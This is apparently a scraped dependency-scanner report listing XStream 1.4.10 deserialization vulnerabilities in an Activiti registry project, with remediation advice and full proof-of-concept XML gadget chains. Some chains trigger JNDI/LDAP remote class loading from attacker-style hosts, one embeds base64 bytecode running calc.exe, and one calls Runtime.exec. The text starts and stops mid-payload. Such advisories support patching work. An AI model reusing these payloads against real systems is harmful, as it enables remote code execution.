                            <default>
                              <rdn class=''javax.naming.CompositeName'' serialization=''custom''>
                                <javax.naming.CompositeName>
                                  <int>0</int>
                                </javax.naming.CompositeName>
                              </rdn>
                            </default>
                          </com.sun.jndi.ldap.LdapAttribute>
                        </com.sun.jndi.ldap.LdapAttribute>
                      </attributes>
                    </com.sun.jndi.ldap.LdapEntry>
                  </entries>
                </aliases>
              </it>
            </mm>
          </multiPart>
        </sm>
      </message>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<sorted-set>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='javax.swing.MultiUIDefaults' serialization='custom'>
      <unserializable-parents/>
      <hashtable>
        <default>
          <loadFactor>0.75</loadFactor>
          <threshold>525</threshold>
        </default>
        <int>700</int>
        <int>0</int>
      </hashtable>
      <javax.swing.UIDefaults>
        <default>
          <defaultLocale>zh_CN</defaultLocale>
          <resourceCache/>
        </default>
      </javax.swing.UIDefaults>
      <javax.swing.MultiUIDefaults>
        <default>
          <tables>
            <javax.swing.UIDefaults serialization='custom'>
              <unserializable-parents/>
              <hashtable>
                <default>
                  <loadFactor>0.75</loadFactor>
                  <threshold>525</threshold>
                </default>
                <int>700</int>
                <int>1</int>
                <string>ggg</string>
                <javax.swing.UIDefaults_-ProxyLazyValue>
                  <className>javax.naming.InitialContext</className>
                  <methodName>doLookup</methodName>
                  <args>
                    <arg>ldap://localhost:1099/CallRemoteMethod</arg>
                  </args>
                </javax.swing.UIDefaults_-ProxyLazyValue>
              </hashtable>
              <javax.swing.UIDefaults>
                <default>
                  <defaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/>
                  <resourceCache/>
                </default>
              </javax.swing.UIDefaults>
            </javax.swing.UIDefaults>
          </tables>
        </default>
      </javax.swing.MultiUIDefaults>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
  <javax.naming.ldap.Rdn_-RdnEntry>
    <type>ysomap</type>
    <value class='com.sun.org.apache.xpath.internal.objects.XString'>
      <m__obj class='string'>test</m__obj>
    </value>
  </javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<linked-hash-set>
  <dynamic-proxy>
    <interface>map</interface>
    <handler class='com.sun.corba.se.spi.orbutil.proxy.CompositeInvocationHandlerImpl'>
      <classToInvocationHandler class='linked-hash-map'/>
      <defaultHandler class='sun.tracing.NullProvider'>
        <active>true</active>
        <providerType>java.lang.Object</providerType>
        <probes>
          <entry>
            <method>
              <class>java.lang.Object</class>
              <name>hashCode</name>
              <parameter-types/>
            </method>
            <sun.tracing.dtrace.DTraceProbe>
              <proxy class='com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl' serialization='custom'/>
                <com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
                  <default>
                    <__name>Pwnr</__name>
                    <__bytecodes>
                      <byte-array>yv66vgAAADIAOQoAAwAiBwA3BwAlBwAmAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBa0gk/OR3e8+AQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBABNTdHViVHJhbnNsZXRQYXlsb2FkAQAMSW5uZXJDbGFzc2VzAQA1THlzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMkU3R1YlRyYW5zbGV0UGF5bG9hZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAJwEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAoAQAzeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRTdHViVHJhbnNsZXRQYXlsb2FkAQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAFGphdmEvaW8vU2VyaWFsaXphYmxlAQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAfeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cwEACDxjbGluaXQ+AQARamF2YS9sYW5nL1J1bnRpbWUHACoBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DAAsAC0KACsALgEACGNhbGMuZXhlCAAwAQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAMgAzCgArADQBAA1TdGFja01hcFRhYmxlAQAbeXNvc2VyaWFsL1B3bmVyNjMzNTA1NjA2NTkzAQAdTHlzb3NlcmlhbC9Qd25lcjYzMzUwNTYwNjU5MzsAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAQAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAAvAA4AAAAMAAEAAAAFAA8AOAAAAAEAEwAUAAIADAAAAD8AAAADAAAAAbEAAAACAA0AAAAGAAEAAAA0AA4AAAAgAAMAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAFwAYAAIAGQAAAAQAAQAaAAEAEwAbAAIADAAAAEkAAAAEAAAAAbEAAAACAA0AAAAGAAEAAAA4AA4AAAAqAAQAAAABAA8AOAAAAAAAAQAVABYAAQAAAAEAHAAdAAIAAAABAB4AHwADABkAAAAEAAEAGgAIACkACwABAAwAAAAkAAMAAgAAAA+nAAMBTLgALxIxtgA1V7EAAAABADYAAAADAAEDAAIAIAAAAAIAIQARAAAACgABAAIAIwAQAAk=</byte-array>
                      <byte-array>yv66vgAAADIAGwoAAwAVBwAXBwAYBwAZAQAQc2VyaWFsVmVyc2lvblVJRAEAAUoBAA1Db25zdGFudFZhbHVlBXHmae48bUcYAQAGPGluaXQ+AQADKClWAQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAANGb28BAAxJbm5lckNsYXNzZXMBACVMeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb287AQAKU291cmNlRmlsZQEADEdhZGdldHMuamF2YQwACgALBwAaAQAjeXNvc2VyaWFsL3BheWxvYWRzL3V0aWwvR2FkZ2V0cyRGb28BABBqYXZhL2xhbmcvT2JqZWN0AQAUamF2YS9pby9TZXJpYWxpemFibGUBAB95c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzACEAAgADAAEABAABABoABQAGAAEABwAAAAIACAABAAEACgALAAEADAAAAC8AAQABAAAABSq3AAGxAAAAAgANAAAABgABAAAAPAAOAAAADAABAAAABQAPABIAAAACABMAAAACABQAEQAAAAoAAQACABYAEAAJ</byte-array>
                    </__bytecodes>
                    <__transletIndex>-1</__transletIndex>
                    <__indentNumber>0</__indentNumber>
                  </default>
                </com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl>
              </proxy>
              <implementing__method>
                <class>com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl</class>
                <name>getOutputProperties</name>
                <parameter-types/>
              </implementing__method>
            </sun.tracing.dtrace.DTraceProbe>
          </entry>
        </probes>
      </defaultHandler>
    </handler>
  </dynamic-proxy>
</linked-hash-set>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Arbitrary Code Execution

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.org.apache.xpath.internal.objects.XString'>
        <m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content: &#x3C;none&#x3E;</m__obj>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
    <javax.naming.ldap.Rdn_-RdnEntry>
      <type>12345</type>
      <value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
        <message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
          <parsedMessage>true</parsedMessage>
          <soapVersion>SOAP_11</soapVersion>
          <bodyParts/>
          <sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
            <attachmentsInitialized>false</attachmentsInitialized>
            <multiPart class='com.sun.xml.internal.messaging.saaj.packaging.mime.internet.MimePullMultipart'>
              <soapPart/>
              <mm>
                <it class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
                  <aliases class='com.sun.jndi.ldap.LdapBindingEnumeration'>
                    <homeCtx>
                      <hostname>233.233.233.233</hostname>
                      <port__number>2333</port__number>
                      <clnt class='com.sun.jndi.ldap.LdapClient'/>
                    </homeCtx>
                    <hasMoreCalled>true</hasMoreCalled>
                    <more>true</more>
                    <posn>0</posn>
                    <limit>1</limit>
                    <entries>
                      <com.sun.jndi.ldap.LdapEntry>
                        <DN>uid=songtao.xu,ou=oa,dc=example,dc=com</DN>
                        <attributes class='javax.naming.directory.BasicAttributes' serialization='custom'>
                          <javax.naming.directory.BasicAttribute>
                            <default>
                              <ignoreCase>false</ignoreCase>
                            </default>
                            <int>4</int>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>objectClass</attrID>
                                </default>
                                <int>1</int>
                                <string>javanamingreference</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaCodeBase</attrID>
                                </default>
                                <int>1</int>
                                <string>http://127.0.0.1:2333/</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaClassName</attrID>
                                </default>
                                <int>1</int>
                                <string>refClassName</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                            <javax.naming.directory.BasicAttribute serialization='custom'>
                              <javax.naming.directory.BasicAttribute>
                                <default>
                                  <ordered>false</ordered>
                                  <attrID>javaFactory</attrID>
                                </default>
                                <int>1</int>
                                <string>Evil</string>
                              </javax.naming.directory.BasicAttribute>
                            </javax.naming.directory.BasicAttribute>
                          </javax.naming.directory.BasicAttribute>
                        </attributes>
                      </com.sun.jndi.ldap.LdapEntry>
                    </entries>
                  </aliases>
                </it>
              </mm>
            </multiPart>
          </sm>
        </message>
      </value>
    </javax.naming.ldap.Rdn_-RdnEntry>
  </java.util.PriorityQueue>
</java.util.PriorityQueue>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Arbitrary Code Execution vulnerability report

high severity

Deserialization of Untrusted Data

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Deserialization of Untrusted Data. This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.

PoC

<map>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs>GBK</cs>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
  <entry>
    <jdk.nashorn.internal.runtime.Source_-URLData>
      <url>http://localhost:8080/internal/</url>
      <cs reference='../../../entry/jdk.nashorn.internal.runtime.Source_-URLData/cs'/>
      <hash>1111</hash>
      <array>b</array>
      <length>0</length>
      <lastModified>0</lastModified>
    </jdk.nashorn.internal.runtime.Source_-URLData>
    <jdk.nashorn.internal.runtime.Source_-URLData reference='../jdk.nashorn.internal.runtime.Source_-URLData'/>
  </entry>
</map>

XStream xstream = new XStream();
xstream.fromXML(xml);

Remediation

Upgrade com.thoughtworks.xstream:xstream to version 1.4.18 or higher.

References

Deserialization of Untrusted Data vulnerability report

high severity

Remote Code Execution (RCE)

  • Vulnerable module: com.thoughtworks.xstream:xstream
  • Introduced through: org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1

Detailed paths

  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-client@5.0.1 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-client-jersey3@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.
  • Introduced through: Activiti/activiti-cloud-registry@Activiti/activiti-cloud-registry org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1 org.springframework.cloud:spring-cloud-netflix-eureka-server@5.0.1 com.netflix.eureka:eureka-core-jersey3@2.0.5 com.netflix.eureka:eureka-core@2.0.5 com.netflix.eureka:eureka-client@2.0.5 com.thoughtworks.xstream:xstream@1.4.10
    Remediation: Upgrade to org.springframework.cloud:spring-cloud-starter-netflix-eureka-server@5.0.1.

Overview

com.thoughtworks.xstream:xstream is a simple library to serialize objects to XML and back again.

Affected versions of this package are vulnerable to Remote Code Execution (RCE). This vulnerability may allow a remote attacker that has sufficient rights to execute commands on the host only by manipulating the processed input stream. No user is affected who followed the recommendation to set up XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 no longer uses a blacklist by default, since it cannot be secured for general purposes.

PoC

<java.util.PriorityQueue serialization='custom'>
  <unserializable-parents/>
  <java.util.PriorityQueue>
    <default>
      <size>2</size>
    </default>
    <int>3</int>
    <dynamic-proxy>
      <interface>java.lang.Comparable</interface>
      <handler class='sun.tracing.NullProvider'>
        <active>true</active>
        <providerType>java.lang.Comparable</providerType>
        <probes>
          <entry>
            <method>
              <class>java.lang.Comparable</class>
              <name>compareTo</name>
              <parameter-types>
                <class>java.lang.Object</class>
              </parameter-types>
            </method>
            <sun.tracing.dtrace.DTraceProbe>
              <proxy class='java.lang.Runtime'/>
              <implementing__method>
                <class>java.lang.Runtime</class>
                <name>exec</name>
                <parameter-types>
                  <class>java.lang.String</class>
                </parameter-types>
              </implementing__method>
            </sun.tracing.dtrace.DTraceProbe>
          </entry>
        </probes>
      </handler>
    </dynamic-proxy>
    <string>calc</string>
